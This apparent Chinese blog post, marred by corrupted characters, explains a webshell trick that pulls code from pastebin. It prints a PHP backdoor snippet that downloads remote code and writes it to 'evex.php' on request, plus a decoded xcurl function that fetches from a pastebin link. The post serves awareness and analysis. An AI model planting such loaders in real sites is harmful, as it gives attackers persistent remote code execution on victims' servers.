這兩天某國外黑客寫了一篇文章關(guān)于他發(fā)現(xiàn)的一種webshell中使用的手法�,大體說說思路����,原文就不翻譯了,我懶��。
簡單來說就是通過一個很簡單的代碼遠(yuǎn)程通過pastebin下載代碼并且執(zhí)行����。
if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http:// pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}
pastebin是一個國外黑客�����,程序員經(jīng)常分享資源����,種子��,代碼的地方�。經(jīng)常從國外獲取資源的同學(xué)應(yīng)該會知道經(jīng)常有黑客把自己黑來的數(shù)據(jù)庫直接放上面進(jìn)行共享。pastebin允許用戶下載原始格式的代碼文件�����,就是說黑客可以使用后門直接下載其他黑客共享的后門�,或者給網(wǎng)站植入存在漏洞的網(wǎng)頁���。
這是其中一個例子��,代碼已經(jīng)經(jīng)過解碼�����。
還有一件事就是印度尼西亞某sb特地制作了pastebin編碼器
上面的代碼解碼后的結(jié)果���。
function FathurFreakz($ct3){
xcurl('http:// pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);
總之要給出一個結(jié)論就是����,像github pastebin這種充斥著數(shù)據(jù)和方便的功能的網(wǎng)站正在越來越多的被黑客利用���。
